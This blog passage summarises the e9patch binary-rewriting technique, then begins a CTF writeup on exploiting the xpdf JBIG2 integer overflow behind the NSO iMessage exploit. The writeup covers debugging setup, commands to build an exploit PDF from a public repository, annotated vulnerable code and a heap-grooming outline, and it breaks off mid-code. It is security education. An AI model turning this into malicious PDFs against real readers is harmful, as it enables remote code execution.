但问题在于，如果待 patch 的指令小于 5 字节呢？以上图为例，将 mov edi, edi 指令替换成 jmpq 后，会一并覆盖掉下面两条指令。如果该函数中存在某条 jmp 指令跳转至被覆盖的那两条指令，则会触发异常，因为跳转目标的 opcode 已经被纂改。

B2: Instruction Punning

这个技术要重点说明一下，因为 e9patch 是基于这项技术进行的扩展。

除了上述两种方法以外，还有一种方法是专门处理一种可以与其他指令安全重叠的 jmpq 指令，这种方法称为指令双关(Instruction Punning)。基本思想是找到与任何重叠指令共享相同字节表示的相对偏移量值，之后使用该相对偏移量，用 jmpq 指令安全地替换被 patch 的指令。

举个简单的例子，:

1 2	mov %rax, (%rbx) add $32, %rax

对应到机器码便是下图中的 original：

假设我们需要 patch 掉 mov $rax, (%rbx)，instruction punning 便可以重用下条指令的前两个字节（0x48 0x83），使得在 patch 点凑出了一个五字节的 jmpq 指令（ jmpq 0x8348xxxx），同时避免修改下条指令的 opcode。

这样，当控制流执行到 mov 指令所对应的位置时，控制流便可以进行 jmpq 跳转。同时如果存在其他指令需要跳转至 add 指令时，add 指令也可以很好的工作，因为 add 指令的 opcode 并没有修改。

指令双关中的这个双关，指的是下条指令中的 opcode，既可以表示该指令，又可以表示 jmpq 的部分偏移量。

但这种方法同样存在局限性。注意到 jmp 中的相对跳转偏移高地址两个字节已经被下个指令的 opcode 给定死了。因此可跳转的内存空间被局限住了，只能相对跳转至相对偏移在 0x83480000~0x8348ffff 这个范围内的内存空间。这个范围的内存空间并非总是可用的，有可能这个范围正对应于：

另一个 trampoline 的内存区域
其他代码段或数据段
无效地址范围，例如 NULL 或下溢至负地址范围

以这个图为例，相对偏移量 0x8348xxxx 实际上是一个负数（32位偏移）。当相对偏移量为负数时，实际跳转至的位置可能在 NULL 周围甚至下溢至负地址范围，而这部分内存空间可能很难 mmap 到。

因此，指令双关技术只能给部分指令打上 patch，可 patch 的覆盖率不高。

三、设计

e9patch 基于上面 B1/B2 的方法，做了一系列改进。在说明具体改进之前，我们先说明该工具所基于的假设：

被 patch 的指令不能被自读取（例如自校验）或自写入。
instrument 或 patch 是用户透明的，即程序行为不会通过某种侧通道（例如计时器、文件描述符等）而发生更改。
输入二进制本身没有使用指令覆盖或指令双关技术。

可以看到这里的假设相对于先前说的依赖编译器、依赖特定语言、依赖二进制元数据等放宽了很多，e9patch 都不依赖这些东西。

e9patch 并不内嵌反汇编器，而是靠用户来输入目标程序的指令信息（例如指令相对偏移和指令大小等等）。这样做的目的是为了实现更好的灵活性，用户可以在只知部分指令信息的情况下完成局部插桩，提高效率；而且还便于 e9patch 嵌入其他的设计中。

接下来我们来讲讲 e9patch 所提供的三种新策略。这里我们看看基于以下指令的一个示例：

Ins1: mov %rax, %(rbx)
Ins2: add $32, %rax
Ins3: xor %rax, %rcx
Ins4: cmpl $77, -4($rbx)

为了便于说明，这里给出几种假设：

假设要 patch 的指令是 Inst1
假设相对跳转偏移为负数时所对应的内存空间是无效的，即不可分配。
因此先前介绍的 Instruction Punning 技术不可用，因为其相对跳转偏移为负数。

T1: Padded Jumps

通常 jmpq 的机器码长度为 5 个字节：1 字节的 opcode 和 4 字节的相对偏移。而实际上，还存在一种方法可以使用更多字节来对 jmpq 进行编码：使用冗余指令前缀形式的额外字节来填充跳转指令。

x86_64 中存在一些不会影响相对跳转指令语义的指令前缀，例如 REX 前缀、段重写前缀 (es,ss等等) 以及操作数重写前缀(0x66)。在这个例子中，我们可以使用指令前缀来对 jmpq 指令进行填充，以将相对偏移的字节表示向高地址处移动。

图中 T1(a) 使用了一个指令前缀 REX (0x48) 进行填充，填充后的 jmpq 范围为 0xc08348XX。由于该偏移量为一个负数值，因此不能使用，需要继续填充。

这里 e9patch 在 T1(a) 的基础上填充了段重写前缀 es (0x26)，填充后即为 T1(b) 的效果。可以看到此时 T1(b) 中 jmpq 的相对跳转指令为 0x20c08348，不再是个正数，因此该 jmpq 大概率可以跳转至一个可被分配的内存空间。

通过上面的这个例子我们可以看到策略 T1 的优点、缺陷和特性：

优点：可以通过额外写入一些指令前缀，来发现并使用新的有效相对跳转偏移
缺点：T1 适用性依赖于指令长度。如果指令长度较短，则 T1 能进行补丁尝试的次数将较少。这也意味着 T1 不能适用于单字节指令的 patch。
特性：每一次新的补丁尝试将会缩小 trampoline 可操作的内存地址范围。例如:
- B2 相对跳转的可操作内存范围：0x83480000~0x8348ffff（范围：0x10000字节）
- T1(a)：0xc0834800~0xc08348ff（范围：0x100字节）
- T1(b): 0x20c08348（范围：0字节）
这之所以被我归类到特性而非缺点，是因为 e9patch 只会在当前前缀所对应的内存空间不满足使用条件时才会继续增加前缀。不满足条件的内存空间范围再大也没有什么用处。

T2: Successor Eviction

如果使用 T1 方法时，再怎么 padding Ins1 也不存在可用的跳转偏移该怎么办？是不是可以尝试修改 Ins2 前几个字节的数据来对 Ins1 patch 提供条件？接下来就要介绍另一种策略，称为后继指令驱逐。其思路是：

将相邻指令 Ins2 驱逐，换成一条 jmpq 指令。
这条 jmpq 指令跳转至一个 trampoline2 上执行原有的 Ins2 指令，之后再调回来继续执行 ins3 即接下来的指令

注：将被驱逐的指令为 victim。

这样一来，Ins2 指令所对应的语义并没有被修改（因为 Ins2 确实被执行，与先前相比只是是在 trampoline2 中执行，同时多了两次跳转操作：调至 trampoline2 再跳回来）。但 Ins2 指令所在的内存地址，其上面的字节表示确确实实的发生了修改。这样一来，Ins1 便可以再次尝试使用 T1 策略来进行 patch，patch 成功后便可跳转至 trampoline1 中执行其他操作。

注意，两个 trampoline 是不一样的。

整个思路可以精简成：

尝试使用 T1 策略，发现 T1 策略无法 patch Ins1。为了修改 Ins1 所依赖的那些 Ins2 上的机器码，e9patch 先尝试使用 T1 策略来 patch Ins2。等 Ins2 patch 成功后，再来对 Ins1 重试 T1 策略。

整个过程仍然保证：

Ins2 的语义与原先一致
程序跳转目标集不变

T3: Neighbour Eviction

如果相邻的指令不满足 patch 条件，同时 Successor Eviction 也不起作用，那该如何呢：

e9patch 会继续向后面找可用的机器码序列，作为其相对跳转偏移 rel32（高地址方向）
找到后，就会在这里原地创建一个 jmpq 指令，即 T3(a)。
之后，在被 patch 指令上 patch 一个相对短跳指令，跳转至这个新的 jmpq 指令处，也就是 T3(b)。
注意到 Ins3 的机器码因为第二步的 patch 被修改。因此这里同样需要对 Ins3 做一个 patch 操作，patch 一个 jmpq 上去，使其跳转至 trampoline 执行 Ins3 指令。
这样便可保证修改后与修改前 Ins3 指令的语义保持不变。（T3©）

T3 策略虽然较为复杂，但其功能较为强大，其关键之处在于 victim 的数量。假设指令平均长度为 4，那么短跳转大概可以跳转至 64 个潜在的 victim，因此大多情况下至少能找到一个合适的 victim，这个策略也将可 patch 指令的覆盖率提高至将近 100%。

以下是 T3 策略的示例：

S1: Reserve Order Patching

上面说的这些情况针对的都是 patch 单个指令的情况。但在实际情况中，通常用户可能会要求连续 patch 多条指令。

这里指的连续 patch 多条指令，不是指将这连续的指令 patch 成一个 trampoline jmp，而是指将连续指令的每一条指令都 patch 成多个 trampoline jmp。

我们再来看看这张图：

假设用户要将 Ins1 patch 成一个 trampoline1 jmp、Ins2 patch 成一个 trampoline2 jmp。那么如果我们先 patch Ins1 的话（T1(b)），可以看到 patch 后的 trampoline1 jmp 指令，会依赖 Ins2 中的机器码（因为 Ins1 jmpq rel32 中的相对偏移量现与 Ins2 的机器码重合）。

这种依赖关系会阻碍 Ins2 的 patch 过程，因为如果先 patch Ins1 再 patch Ins2 的话，Ins2 的 patch 过程可能会影响到 patch 后的 Ins1。

因此为了更好的管理多个 patch 的位置，e9patch 使用反向顺序补丁策略。其基本思想是：按照从高到低的地址顺序来 patch 指令，因为 指令双关只能引入与后续指令的依赖关系。

e9patch 保存了每个指令机器码的状态，即锁定和未锁定，这可以使用一个 Bitmap 来保存。当某个机器码：

被 e9patch 修改
被用于指令双关的一部分机器码

则认为这个机器码是被锁定的。

T1-T3 的这些策略限制了：

patch 操作将不能修改被锁定的机器码（但是仍然可以利用，或者重叠）
仅锁定当前 patch 位置后的字节（为了便于管理依赖）
这使得 T3 的短跳 rel8 只能是正数，将可跳转的范围（即可被驱逐的指令个数）缩小一半。
但是实际上这种限制在实验中影响很小。

M1: Memory and File Size Management

最后我们来考虑一下 trampoline 的内存存放位置。在先前的策略中我们可以看到，trampoline 的内存地址受到指令双关中相对偏移量的限制。例如：

T1(b) 的 trampoline addr 为 0x20c08348
T3(b) 中的 trampoline addr 为 0x4dfc7b83

这之中相差了非常远的内存距离，会影响 trampoline 的打包，导致高内存碎片和低内存利用率。同时离散的 trampoline 也会大大增加其保存在 ELF 文件中的大小。

那么很明显有一种方法可以缓解这种低效率的情况：将多个 trampoline 尽可能地放到同一个虚拟页中。只是最坏情况下是一个 trampoline 存放至一个内存页中。

因此 e9patch 还使用了一种机制称为 Physical Page Grouping：

尝试将多个存放在不同 virtual page 中的 trampoline，聚拢并存放到同一个 physical page。

以上图为例，先前是一个 Physical Page P(a) 对应于一个 Virtual Page V(a)。这种对应关系会占用大量的物理内存。但执行 Physical Page Grouping 后，映射关系是一个 Physical Page P(b) 对应于多个 Virtual Page V(b)，这样可以节省下大量的物理内存。

注：一个跨越 Page 的 trampoline 被视为两个 mini trampoline。

从 V(a) 到 P(b) 的这种 grouping 算法称为分区算法。分区算法的实现有很多种，这里 e9patch 选择的是最简单的贪心算法，而且性能较为不错。

Physical Page Grouping 也有自身的副作用：

会将那些没有用到的 trampoline 加载进冗余的内存位置。由于这些冗余的 trampoline 并没有被使用，因此不会影响到程序的行为。
会导致同一物理内存被多次映射至虚拟空间中，映射次数可能会超过默认的最大映射次数 vm.max_map_count = 65536。有两种解决方法：
1. 使用 sudo 修改默认最大内存映射次数，不太现实。
2. 控制 e9patch 的划分精度参数 M（聚拢 trampoline 所使用的最大物理页面个数），增加所使用的物理页面个数 P(b)，从而降低每个物理内存的映射次数。通常 M >= 64 时，单个二进制文件的物理内存页面映射次数便会始终小于默认内存最大映射次数。

四、实现

e9patch 的输入：

未被 patch 的二进制程序
二进制程序的指令信息，包括位置和指令大小
待 patch 的指令位置信息集合
trampoline 集合

输出：一个使用上述策略的被 patch 程序。重写后的二进制文件相当于原始文件的插入式替换，无需额外依赖项。

实现中有两个点需要注意：

新的 trampoline 被添加至 ELF 文件的末尾，防止移动现有的数据或代码，以避免修改复杂的 ELF header。
存放 trampoline 的新物理页面必须在程序加载期间映射到程序的虚拟地址空间。在具体实现中，e9patch 将一个 mini loader 集成到了输出的二进制文件中，并将入口点替换成 mini loader 的入口点。待将 trampoline 所对应的虚拟页面映射完成后，再将控制流返回到真正的入口点。

e9patch 同时支持 PIE 和 non-PIE 的二进制文件。而且 PIE 程序会比 non-PIE 程序更好被 patch，因为 PIE 的代码通常会被加载到内存地址较高的位置，而 non-PIE 会被加载到内存地址较低的位置，而这与 NULL 更近。

某些情况会影响到 e9patch 的使用：

L1: 虚拟内存短缺。对于一些具有非常大的代码段或者数据段的程序可能会限制 trampoline 的使用空间，因为 jmpq 的偏移是 32 位的，如果代码段和数据段太大，则可能会无法跳转至堆空间中。
L2: patch 单字节指令。e9patch 无法 patch 单字节指令，这会影响到包括 push、pop、ret 在内的指令。
L3: patch 超大量的指令。如果尝试 patch 相当多指令的话，可能会因为机器码依赖关系而降低 patch 覆盖率。

除此之外，e9patch 不能处理那些 inline data 的情况，即 data 包含在 code 之中的情况。

不过通常情况下 L1并不适用于大部分程序; L2 和 L3 也与许多程序没有什么关系。

五、评估

主要从以下几个指标评估：

patch 时间
patch 覆盖率
patch 后的二进制文件大小
e9patch 实现原型的 scalability

e9patch 可应用与二进制加固、插桩和修复等等。patch 程序时， e9patch 主要为以下两种指令进行 patch：

所有 jmp/jcc 跳转指令
粗略模拟覆盖率插桩，因为 e9patch 在设计上没有基本块的信息，因此只是粗略的 patch 掉每个 jmp 指令。
所有可能会写入堆指针的指令
这里模拟的是二进制加固情况下，patch 掉写入堆指针相关的指令。

所有被 patch 的指令，都替换成一个除了执行原始指令以外的空 trampoline。以下是评估的结果：

#Loc: 总被 patch 的个数
Base%: B1+B2 策略
Succ%：总 patch 覆盖率

从上图可以看到：

e9patch 的覆盖率相当的高，基本可以接近 100%。
在 baseline 覆盖率不高的情况下，T1-T3 策略可以将覆盖率极大的往高处升。
这里尤其需要强调一下 T3 策略。T3 策略本身可 patch 的覆盖率就比较大，可以 patch 那些其他策略无法 patch 的指令。
PIE 程序中任何一种 patch 策略都会比 non-PIE 程序中所对应的 patch 覆盖率要高很多。
gamess 和 zeusmp 之所以覆盖率没有到 100% 是因为这两个程序都分配了相当大的 .bss 段（正对应于 L1）。当这两个程序使用 PIE 模式进行编译时可以达到 100% 的覆盖率。
在使用 physical page grouping 策略后，文件大小分别涨幅 +57% / +30% ，还算可以接受。
在不使用该策略的情况下，大小涨幅分别是 +2239.83% / +568.96%，这就实在没法接受了。

之后是 scalability 的测试，这里是使用大型程序 chrome 和 firefox 的测试结果：

firefox 将大部分代码放置在 libxul.so 中。

测试时选择的测试集要求尽可能减小执行 JIT - JS 的代码执行时间。因为 e9patch 没法对 JIT 代码打 patch。

可以看到，chrome 引入了 ~+113% 的 overhead，firefox 引入了~+46% 的 overhead。firefox overhead 较低的一种可能原因是 firefox 花更多时间执行 JIT 代码，或者执行未被插桩的 shared object。

通过上面的内容可以看到， e9patch 可以很轻松的将 patch 规模扩展至上百兆文件大小的二进制程序。

最后是 e9patch 应用在二进制加固下的表现，这里先介绍一下测试用的二进制加固技术—— LowFat Pointer。其基本思想为：将程序虚拟内存空间分割为多个 large region，其中每个 region 负责分配一个给定的固定大小范围的对象：

第一个 Region 像往常一样包含程序文本、数据、bss等段。
后面的区域用于 LowFat 指针分配。例如，
- Region #1用于大小为 1-16 字节的分配
- Region #2 用于大小为 17-32 字节的分配
- 等等
此外，所有 LowFat 分配的对象都与分配大小边界对齐。这样一来，每一个 LowFat 指针的值都可以用于获取该对象的内存边界。

举个简单的例子：

1	p = malloc(10); // p = 0x8997f2820

由于指针 p 的值位于 0x800000000~0x1000000000 中，因此可以得知 p 所指向的内存大小为 16 字节（注意内存对齐）。

对于内存访问 q = 0x8997f2825，由于：

q 位于 0x800000000~0x1000000000 范围，因此 object size 大小为 16 字节
由于 q 向下与 object size 对齐得到地址 0x8997f2820，这样便可得知 object 基地址

接下来对以下函数插桩：

char get(char *q, int i)
{
    return q[i];
}

得到该函数以检测 OOB：

char get(char *q, int i)
{
    char *q_base = base(q);
    size_t q_size = size(q);
    char *r = q + i;
    if (r < q_base || r >= q_base + q_size)
        report_oob_error();
    return *r;
}

而下图便是 e9patch 应用 LowFat 变体的实验结果：

而 lowfat 项目本身只能用在 C/C++ 语言中，而 e9patch 可以应用至任何语言的二进制文件中，因此 e9patch 相当的强大。

RWCTF2022 Pwn 笔记3 - hso groupie Writeup

2022-02-01T16:00:00.000Z

简介

这里是复盘 RWCTF2022 中 hso groupie 题时所写下的一些笔记，考点来源于 Project Zero 的 A deep dive into an NSO zero-click iMessage exploit: Remote Code Execution 一文。

整体的做题思路主要由 Riatre 师傅的 exploit 中所推导出，换句话说，这里的笔记主要是对作者 exploit 的解释说明。

由于这题同样也较为复杂，因此需要单独开一个博文来记录。

联合作者：sakura

一、小叙

Help check how secure our latest PaaS (Pdftohtml-as-a-Service) is!
Pick your favorite bug from this bloody list, or really, just exploit that bug so your exploit would also work on latest Poppler [1] and maybe even KItinerary.
The container image is also available on Docker Hub.
[1] Yeah, turns out propagating bug fixes between different Clone-and-Own codebases takes time :)
socat -t90 stdio tcp-connect:47.242.147.191:31337
attachment

Clone-and-Pwn, difficulty:hard

这题是 clone-and-pwn，源码没有做任何改变，就是通过查看最近提交的漏洞修复记录来发掘并利用漏洞。

二、环境搭建

1. 本地环境搭建

这一题是在 debian 下编译的，因此对于 debian 系统来说，有些系统可以直接跑 exp（例如我的 XD）。

wget https://dl.xpdfreader.com/xpdf-4.03.tar.gz
tar -zxvf xpdf-4.03.tar.gz
cd xpdf-4.03
mkdir build
cd build
cmake -DCMAKE_BUILD_TYPE=Debug -DCMAKE_CXX_FLAGS="-D_FORTIFY_SOURCE=2 -fstack-protector-strong -Wl,-z,now -Wl,-z,relro -g3 -ggdb3 -O0" ..
make -j `nproc` 

# 题目还给了一个 `GNU C Library (Debian GLIBC 2.33-2) release` 的 glibc 附件
patchelf --replace-needed libc.so.6 ${PWD}/../../libc.so.6 ./xpdf/pdftohtml

启动方式：

1	xpdf/pdftohtml --

2. exploit 调试环境搭建

去题目环境这里下载 dockerfile 等题目环境，之后给 dockerfile 打 patch：

--- a/Dockerfile
+++ b/Dockerfile
@@ -8,7 +8,7 @@ RUN cd /tmp/xpdf-4.03 && \
     mkdir build && \
     cd build && \
     cmake -DCMAKE_BUILD_TYPE=Release \
-        -DCMAKE_CXX_FLAGS="-D_FORTIFY_SOURCE=2 -fstack-protector-strong -Wl,-z,now -Wl,-z,relro" .. && \
+        -DCMAKE_CXX_FLAGS="-D_FORTIFY_SOURCE=2 -fstack-protector-strong -Wl,-z,now -Wl,-z,relro -g3 -ggdb3 -O0 " .. && \
     make -j$(nproc)

 FROM debian:unstable-20211220-slim
@@ -20,6 +20,7 @@ RUN echo "deb [check-valid-until=no] http://snapshot.debian.org/archive/debian/2
     apt-get install -y fonts-arkpandora fonts-noto fonts-dejavu fonts-font-awesome fonts-lato fonts-powerline gsfonts && \
     apt-get clean && rm -rf /var/lib/apt/lists/*
 COPY --from=build /tmp/xpdf-4.03/build/xpdf/pdftohtml /usr/local/bin/
+COPY gdbserver /usr/bin/gdbserver
 RUN mkdir -p /run/secrets && echo 'rwctf{flag placeholder}' > /run/secrets/flag

-ENTRYPOINT [ "/bin/sh", "-c", "/usr/local/bin/pdftohtml \"$@\"", "--" ]
\ No newline at end of file
+ENTRYPOINT [ "/bin/sh"]
\ No newline at end of file

修改目的主要是把 gdbserver 放进镜像里，以及让入口点停在 /bin/sh，而不直接启动 pdftohtml。

这里要注意 COPY 命令的源路径，这里是直接使用相对路径。

执行 build.sh，执行完成后可以检查一下镜像

1
2
3

➜  chall git:(master) docker image ls         
REPOSITORY             TAG                      IMAGE ID       CREATED             SIZE
hsogroupie/pdftohtml   latest                   042e72a0f133   45 minutes ago      946MB

启动 docker 镜像

1	docker run -itd -p 1234:1234 -v sakura_volume:/tmp/chall --cap-add=SYS_PTRACE --security-opt seccomp=unconfined --name hsogroupie hsogroupie/pdftohtml

该命令非常长，解构如下：

docker run --help

-i : 进入交互模式
-t : 分配一个伪shell
-d : 在后台以守护模式运行容器
-p : 宿主机端口:容器端口，将容器端口映射到宿主机端口，这里都指定1234就好了
-v : 挂载数据卷
--cap-add=SYS_PTRACE --security-opt seccomp=unconfined : Docker默认禁用PTRACE功能，需要指定这个命令
--name : 给容器声明一个名字

这里挂载数据卷需要额外说明（参考这篇文章）

docker volume create sakura_volume // 创建一个自定义容器卷
docker volume ls // 查看所有容器卷
docker volume inspect sakura_volume // 查看指定容器卷详情信息
...
[
    {
        "CreatedAt": "2022-02-02T01:29:55+08:00",
        "Driver": "local",
        "Labels": {},
        "Mountpoint": "/var/lib/docker/volumes/sakura_volume/_data",
        "Name": "sakura_volume",
        "Options": {},
        "Scope": "local"
    }
]

然后我们对 /var/lib/docker/volumes/sakura_volume/_data 的修改就会映射到容器的 /tmp/chall 里，传输文件就比较方便。

启动完了之后我们可以 docker ps 一下看看有没有问题

1
2
3

➜  chall git:(master) docker ps -a                     
CONTAINER ID   IMAGE                  COMMAND     CREATED          STATUS          PORTS                                       NAMES
15f265c337c0   hsogroupie/pdftohtml   "/bin/sh"   34 minutes ago   Up 34 minutes   0.0.0.0:1234->1234/tcp, :::1234->1234/tcp   hsogroupie

生成 exp pdf，注意要对 submodule 初始化，不然没有 jbig2enc 库

git clone https://github.com/Riatre/hso-groupie.git
cd hso-groupie/exploit
git submodule update --init
cd ..
sudo cp -r exploit /var/lib/docker/volumes/sakura_volume/_data

然后我们进入 docker 容器里对应数据卷的 exploit 目录下，应该要 install 这些安装包，要是少了就自己补一下：

apt-get update
apt-get install make g++ python3 pybind11-dev python3-dev python2 python2-dev
make
...
...
root@15f265c337c0:/tmp/chall/exploit# make
g++ -O3 -std=c++20 -shared -fPIC jbig2arith.cc jbig2arith.h jbjbarith.cc jbjbarith.h -ojbjbarith.cpython-39-x86_64-linux-gnu.so -I/usr/include/python3.9 -I/usr/include/python3.9
python3 sploit.py
python2 pdf.py sploit > sploit.pdf

调试 exp

1	docker exec -it 15f265c337c0 bash

进入容器的 bash 环境，然后启动 gdbserver

1	rm -rf output && /usr/bin/gdbserver :1234 /usr/local/bin/pdftohtml /tmp/chall/exploit/sploit.pdf output

这里的 output 是随便给一个文件夹名就行了，这是 pdftohtml 必须的启动参数，它会创建这个文件夹，并输出一个结果到这个文件夹里，并且它不能是已经存在的文件夹，而 sploit.pdf 就是我们生成出来的 exp pdf 文件。

然后在宿主机也启动 gdb，然后 target remote:1234，然后随便下个断点看看效果，注意因为 docker 里的源码路径和我宿主机的源码路径并不一致，所以要用 substitute-path 做个转换，建议写个 gdb 脚本完成这个事情，后面就不用一直自己敲了。

target remote :1234
set substitute-path  /tmp/xpdf-4.03/xpdf /home/sakura/ctf/hso-groupie/chall/xpdf-4.03/xpdf
b findSegment
c
...
...
 ► 0x555555675179    mov    r8, qword ptr [rax]
   0x55555567517c    cmp    dword ptr [r8 + 8], esi
   0x555555675180    jne    0x555555675170                <0x555555675170>
    ↓
   0x555555675170    add    rax, 8
   0x555555675174    cmp    rax, rdx
   0x555555675177    je     0x555555675190                <0x555555675190>
───────────────────────────────────────[ SOURCE (CODE) ]────────────────────────────────────────
In file: /home/sakura/ctf/hso-groupie/chall/xpdf-4.03/xpdf/JBIG2Stream.cc
   4036 JBIG2Segment *JBIG2Stream::findSegment(Guint segNum) {
   4037   JBIG2Segment *seg;
   4038   int i;
   4039 
   4040   for (i = 0; i < globalSegments->getLength(); ++i) {
 ► 4041     seg = (JBIG2Segment *)globalSegments->get(i);
   4042     if (seg->getSegNum() == segNum) {
   4043       return seg;
   4044     }
   4045   }
   4046   for (i = 0; i < segments->getLength(); ++i) {
───────────────────────────────────────────[ STACK ]────────────────────────────────────────────
00:0000│ rsp 0x7fffffffdd28 —▸ 0x555555676c72 ◂— mov    r12, rax
01:0008│     0x7fffffffdd30 ◂— 0x0
02:0010│     0x7fffffffdd38 ◂— 0x0
03:0018│     0x7fffffffdd40 —▸ 0x555561ec0f00 ◂— 0x200000001
04:0020│     0x7fffffffdd48 —▸ 0x555561f40c64 ◂— 0x203a100000000
05:0028│     0x7fffffffdd50 ◂— 0x0
... ↓        2 skipped
─────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────
 ► f 0   0x555555675179
   f 1   0x555555676c72
   f 2   0x555555679198 JBIG2Stream::readSegments()+1032
   f 3   0x555555679473 JBIG2Stream::reset()+211
   f 4   0x55555560139a
   f 5   0x5555556494a9
   f 6   0x55555564aba0
   f 7   0x55555563c9e5

现在我们就完成了整个调试环境的搭建。

三、漏洞点

这题预期的解法是使用这篇 google project zero 的 iMessage exploit 中的漏洞。漏洞点位于 JBIG2Stream：

void JBIG2Stream::readTextRegionSeg(Guint segNum, GBool imm,
                    GBool lossless, Guint length,
                    Guint *refSegs, Guint nRefSegs) {
  ...
  Guint numSyms;
  ...
  // get symbol dictionaries and tables
  codeTables = new GList();
  // 1. 初始时为 0
  numSyms = 0;  
  for (i = 0; i < nRefSegs; ++i) {
    if ((seg = findSegment(refSegs[i]))) {
      if (seg->getType() == jbig2SegSymbolDict) {
        // 2. 该变量与一个用户可控的值相加，会造成整数溢出
        numSyms += ((JBIG2SymbolDict *)seg)->getSize();
      } else if (seg->getType() == jbig2SegCodeTable) {
        codeTables->append(seg);
      }
    } else {
      ...
    }
  }
  ...
  // get the symbol bitmaps
  // 3. 整数溢出后，这里分配了一个较小的堆内存（指针数组）
  syms = (JBIG2Bitmap **)gmallocn(numSyms, sizeof(JBIG2Bitmap *));
  kk = 0;
  for (i = 0; i < nRefSegs; ++i) {
    if ((seg = findSegment(refSegs[i]))) {
      if (seg->getType() == jbig2SegSymbolDict) {
        symbolDict = (JBIG2SymbolDict *)seg;
        // 4. 将各个指针写入该堆内存，触发堆溢出
        for (k = 0; k < symbolDict->getSize(); ++k) {
          syms[kk++] = symbolDict->getBitmap(k);
        }
      }
    }
  }
  ...
}

由于恶意构造的 refSegs 中，一些 seg->getSize() 值很大（4GB），因此如果全部写进则肯定会触发 crash。所以在实际的漏洞利用中，会尝试先做做堆风水：

看图，exploit 需要将 segments GList 的后备存储，放置在刚刚创建的溢出堆块的高地址处。这样触发堆溢出时，就能在执行前几个正常 size 的写入操作时，将后备存储中的那个超大 size 所对应的 segment 指针，替换成非 JBIG2SymbolDict 类型的 segment 指针（即 JBIG2Bitmap 类型）。之后当程序检索这个 segment 指针时，就会跳过该指针的检索。

四、漏洞利用前置知识

1. JBIG2Decode

漏洞点位于 JBIG2Stream ，而 JBIG2Stream 又怎么存在于 pdf 中呢？

pdf 文件结构本质上是一个树状图，这里给出一个使用 JBIG2Stream 的 pdf 片段：

4 0 obj
<< /Filter /FlateDecode
/Length 3988
>>
stream
/* [MyStream1] */
endstream
endobj

5 0 obj
<< /DecodeParms  << /JBIG2Globals 4 0 R >>
/Width 1024
/ColorSpace /DeviceGray
/Height 1
/Filter /JBIG2Decode
/Subtype /Image
/Length 418248
/Type /XObject
/BitsPerComponent 1
>>
stream
/* [MyStream2] */
endstream
endobj

pdf 文件中，4 0 obj、5 0 obj 都是表示一个特定的 pdf object。

其中，4 0 obj 标识了下面中的 MyStream1，其参数 /Filter /FlateDecode 表示该流是使用 zlib 压缩。

继续往下看可以看到： 5 0 obj 中，/DecodeParms 引用了 4 0 obj 中的 stream 流，即 MyStream1；同时参数 /Filter /JBIG2Decode 指定了接下来的流 MyStream2 使用的解码方式是 JBIG2Decode。

因此从上文可以得知，MyStream2 使用 JBIG2Decode 进行解码，其解码参数为上面引用的这个 4 0 obj，即 MyStream1 使用 FlateDecode 所解码后的流，而该参数的键为 JBIG2Globals。

而我们要做的，就是精心构建 MyStream1 和 MyStream2（这两个流都是 JBIG2Stream），使其在解析这两个 Stream 时能触发漏洞，从而 get shell。

构建好这两个流后，可以使用 jbig2enc/pdf.py 来创建出 pdf。

2. Segments 小叙

注，这一节中，每个 segment 所对应的代码最好亲自阅读一下。

当 xpdf 对 JBIG2Stream 解码时，正如上节中所示，JBIG2Decode 需要一个参数 JBIG2Globals。因此在解析时，会先解析 JBIG2Globals 的 stream，之后再解析下面的 main stream。以下代码说明了 stream 的解析过程：

void JBIG2Stream::reset()
{
    GList *t;

    segments = new GList();
    globalSegments = new GList();

    // read the globals stream
    if (globalsStream.isStream())
    {
        // 解析以 DecodeParms 传来的 global stream 流，即 FlateDecode(MyStream1)
        curStr = globalsStream.getStream();
        curStr->reset();
        // 解析时需要使用到解码器，这里是对解码器进行初始化
        arithDecoder->setStream(curStr);
        huffDecoder->setStream(curStr);
        mmrDecoder->setStream(curStr);
        // 开始读取 segments
        readSegments();
        curStr->close();
        // swap the newly read segments list into globalSegments
        t = segments;
        segments = globalSegments;
        globalSegments = t;
    }

    // read the main stream
    // 解析 main stream, 即 MySteram2
    curStr = str;
    curStr->reset();
    // 同样对解码器进行初始化
    arithDecoder->setStream(curStr);
    huffDecoder->setStream(curStr);
    mmrDecoder->setStream(curStr);
    readSegments();

    if (pageBitmap)
    {
        dataPtr = pageBitmap->getDataPtr();
        dataEnd = dataPtr + pageBitmap->getDataSize();
    }
    else
    {
        dataPtr = dataEnd = NULL;
    }
}

这里我们可以了解到，JBIG2Stream 是由多个 Segment 组成的，Segment 种类较多。这里我们只关注几个有用到的 Segment。

a. EOFSeg

该 Segment 的解析标志了完成了全部 segment 的读取，没有其他用途。

b. SymbolDictSeg

SymbolDict 主要存放了一个指向 Bitmap 的指针数组。Bitmap 可以用于存放数据，在实际漏洞利用中将起到类似内存的作用。

对于每个 symbol dict 中的 Bitmap，规范中将其称为一个 instance。

解析 SymbolDictSeg 时，将会从 stream 中读取并创建出每一个 Bitmap。

GBool JBIG2Stream::readSymbolDictSeg(Guint segNum, Guint length,
                                     Guint *refSegs, Guint nRefSegs)
{
    [...]
    // 创建 bitmaps 数组
    // get the input symbol bitmaps
    bitmaps = (JBIG2Bitmap **)gmallocn(numInputSyms + numNewSyms,
                                       sizeof(JBIG2Bitmap *));
    for (i = 0; i < numInputSyms + numNewSyms; ++i)
    {
        bitmaps[i] = NULL;
    }
    k = 0;
    inputSymbolDict = NULL;
    for (i = 0; i < nRefSegs; ++i)
    {
        if ((seg = findSegment(refSegs[i])))
        {
            if (seg->getType() == jbig2SegSymbolDict)
            {
                inputSymbolDict = (JBIG2SymbolDict *)seg;
                for (j = 0; j < inputSymbolDict->getSize(); ++j)
                {
                    bitmaps[k++] = inputSymbolDict->getBitmap(j);
                }
            }
        }
    }
    [...]
    // 开始尝试从外部 JBIG2Stream 流中读取 bitmap
    symHeight = 0;
    i = 0;
    while (i < numNewSyms)
    {
        // read the height class delta height
        if (huff) [...]
        else
        {
            arithDecoder->decodeInt(&dh, iadhStats);
        } 
        [...]
        symHeight += dh;
        symWidth = 0;
        totalWidth = 0;
        j = i;

        [...]

        // read the symbols in this height class
        while (1)
        {
            // read the delta width
            if (huff) [...]
            else
            {
                if (!arithDecoder->decodeInt(&dw, iadwStats))
                {
                    break;
                }
            }
            [...]

            // using a collective bitmap, so don't read a bitmap here
            if (huff && !refAgg) [...]
            else if (refAgg) [...]
            else
            {
                // 从外部流中读取 bitmap 并将其保存进数组中
                bitmaps[numInputSyms + i] =
                    readGenericBitmap(gFalse, symWidth, symHeight,
                                    sdTemplate, gFalse, gFalse, NULL,
